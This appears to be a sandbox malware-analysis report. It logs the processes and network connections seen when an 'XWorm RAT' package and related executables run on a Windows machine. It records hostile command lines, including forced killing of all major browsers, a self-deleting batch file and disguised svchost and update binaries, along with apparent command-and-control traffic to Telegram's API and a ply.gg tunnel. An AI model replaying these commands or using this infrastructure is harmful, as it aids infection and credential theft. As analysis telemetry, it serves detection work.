"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6460 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:1
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\Pictures\b3ownddosser.exe
"C:\Users\Admin\Pictures\b3ownddosser.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Users\Admin\Pictures\b3ownddosser.exe
"C:\Users\Admin\Pictures\b3ownddosser.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Users\Admin\Pictures\b3ownddosser.exe
"C:\Users\Admin\Pictures\b3ownddosser.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Users\Admin\Pictures\b3ownddosser.exe
"C:\Users\Admin\Pictures\b3ownddosser.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Users\Admin\Pictures\b3ownddosser.exe
"C:\Users\Admin\Pictures\b3ownddosser.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpDF3E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpDF3E.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 6544"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\Fixer.bat" "
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp46A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp46A.tmp.bat
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 5588"
C:\Windows\system32\find.exe
find ":"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe
"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"
C:\Windows\system32\lodctr.exe
lodctr /r
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe
"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM brave.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM msedge.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM firefox.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /F /IM opera.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | moonreborn.com | udp |
| US | 172.67.133.17:443 | moonreborn.com | tcp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| BE | 88.221.83.187:443 | www.bing.com | tcp |
| BE | 88.221.83.187:443 | www.bing.com | tcp |
| BE | 2.17.107.130:443 | r.bing.com | tcp |
| BE | 2.17.107.130:443 | r.bing.com | tcp |
| BE | 88.221.83.226:443 | th.bing.com | tcp |
| BE | 88.221.83.226:443 | th.bing.com | tcp |
| IE | 20.190.159.2:443 | login.microsoftonline.com | tcp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| US | 140.82.112.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| GB | 2.18.66.75:443 | | tcp |
| IE | 20.50.73.4:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 186.83.221.88.in-addr.arpa | udp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| BE | 88.221.83.186:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | teams-ring.msedge.net | udp |
| US | 52.113.196.254:443 | teams-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | roxy.azurefd.net | udp |
| US | 104.212.67.120:443 | roxy.azurefd.net | tcp |
| US | 8.8.8.8:53 | 254.196.113.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.67.212.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:8000 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 172.217.16.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| GB | 142.250.179.227:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mail.google.com | udp |
| GB | 172.217.16.229:443 | mail.google.com | tcp |
| GB | 172.217.16.229:443 | mail.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | 229.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.206.125.74.in-addr.arpa | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| GB | 216.58.213.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | accounts.youtube.com | udp |
| GB | 172.217.16.238:443 | accounts.youtube.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 10.213.58.216.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | play.google.com | tcp |
| GB | 142.250.187.206:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
| N/A | 10.127.0.168:5900 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.16.229:443 | mail.google.com | tcp |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | tcp |
| BE | 74.125.206.84:443 | accounts.google.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.49.178.192.in-addr.arpa | udp |
| N/A | 127.0.0.1:5900 | | tcp |
| US | 192.178.49.163:443 | beacons.gcp.gvt2.com | udp |
| BE | 74.125.206.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| BE | 88.221.83.200:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 200.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| BE | 88.221.83.200:443 | r.bing.com | tcp |
| BE | 88.221.83.200:443 | r.bing.com | tcp |
| BE | 2.17.107.107:443 | r.bing.com | tcp |
| BE | 2.17.107.107:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 107.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | repository-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 21.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.154.64.172.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | full-wet.at.ply.gg | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| BE | 88.221.83.201:443 | r.bing.com | tcp |
| BE | 88.221.83.185:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 201.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.83.221.88.in-addr.arpa | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| BE | 88.221.83.248:443 | th.bing.com | tcp |
| BE | 88.221.83.201:443 | r.bing.com | tcp |
| BE | 88.221.83.248:443 | www.bing.com | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| BE | 88.221.83.248:443 | www.bing.com | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| GB | 20.26.156.216:443 | codeload.github.com | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 195.3.223.234:80 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 195.3.223.234:80 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 195.3.223.234:80 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| US | 8.8.8.8:53 | full-wet.at.ply.gg | udp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 195.3.223.234:80 | | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 195.3.223.234:80 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 195.3.223.234:80 | | tcp |
| N/A | 127.0.0.1:8000 | | tcp |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | telegram.org | udp |
| US | 8.8.8.8:53 | cdn4.cdn-telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 34.111.35.152:443 | cdn4.cdn-telegram.org | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.35.111.34.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 195.3.223.234:80 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| BE | 88.221.83.219:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 219.83.221.88.in-addr.arpa | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 195.3.223.234:80 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| PL | 209.25.141.180:38848 | full-wet.at.ply.gg | tcp |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| N/A | 127.0.0.1:8000 | tcp | |
| N/A | 127.0.0.1:8000 | tcp | |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
